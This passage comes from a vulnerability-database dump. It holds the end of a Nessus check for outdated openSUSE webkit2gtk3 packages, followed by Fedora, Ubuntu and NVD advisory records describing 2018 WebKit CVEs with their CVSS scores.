use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandled\n an unset pageURL, leading to an application crash\n (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS)\n vulnerability allowed remote attackers to inject\n arbitrary web script or HTML via a crafted URL\n (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit\n unexpectedly failed to use system proxy settings for\n WebSocket connections. As a result, users could be\n deanonymized by crafted websites via a WebSocket\n connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit\n failed to perform TLS certificate verification for\n WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on\n an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio\n (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on\n GTlsConnection::accept-certificate to finish the load\n earlier in case of errors.\n\n - Properly close the connection to the nested wayland\n compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some\n websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and\n Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate\n virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to\n webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and\n destroyed quickly.\n\n - Fix a network process crash when load is cancelled while\n searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and\n ENABLE_XSLT are disabled.\n\n - New API to retrieve and delete cookies with\n WebKitCookieManager.\n\n - New web process API to detect when form is submitted via\n JavaScript.\n\n - Several improvements and fixes in the touch/gestures\n support.\n\n - Support for the &ldquo;system&rdquo; CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver\n implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled\n by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale\n factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix crashes upower crashes when running inside a chroot\n or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using\n GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build\n with asan support.\n\n - Fix a crash a under Wayland when using mesa software\n rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires\n libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll\n horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing\n the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash aftter a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in\n libjavascriptcoregtk and libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via\n JavaScript.\n\n - Add new API to replace\n webkit_form_submission_request_get_text_fields() that is\n now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and\n deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via\n WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes\n between points and pixels.\n\n - Ensure cookie operations take effect when they happen\n before a web process has been spawned.\n\n - Automatically adjust font size when\n GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing\n commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a\n redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.20.3-11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2018-06-29T08:06:09", "published": "2018-06-29T08:06:09", "id": "FEDORA:EC42160A1040", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: webkitgtk4-2.20.3-1.fc27", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKit2 based WebKitGTK+ for GTK+ 3. ", "modified": "2018-06-16T20:20:25", "published": "2018-06-16T20:20:25", "id": "FEDORA:A7C5B60D2E0C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: webkit2gtk3-2.20.3-1.fc28", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:38:27", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-12293", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "description": "A large number of security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.", "edition": 6, "modified": "2018-06-18T00:00:00", "published": "2018-06-18T00:00:00", "id": "USN-3687-1", "href": "https://ubuntu.com/security/notices/USN-3687-1", "title": "WebKitGTK+ vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T20:25:32", "description": "webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-01T13:29:00", "title": "CVE-2018-11646", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11646"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:webkitgtk:webkitgtk\\+:2.21.3"], "id": "CVE-2018-11646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11646", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:webkitgtk:webkitgtk\\+:2.21.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation.", "edition": 12, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4222", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4222"], "modified": "2019-03-07T17:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4222", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 12, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4233", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "2019-06-02T17:29:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4233", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4233", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted web site.", "edition": 12, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4199", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4199"], "modified": "2019-03-07T21:09:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to overwrite cookies via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4232", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4232"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4232", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4232", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site that triggers an @generatorState use-after-free.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", 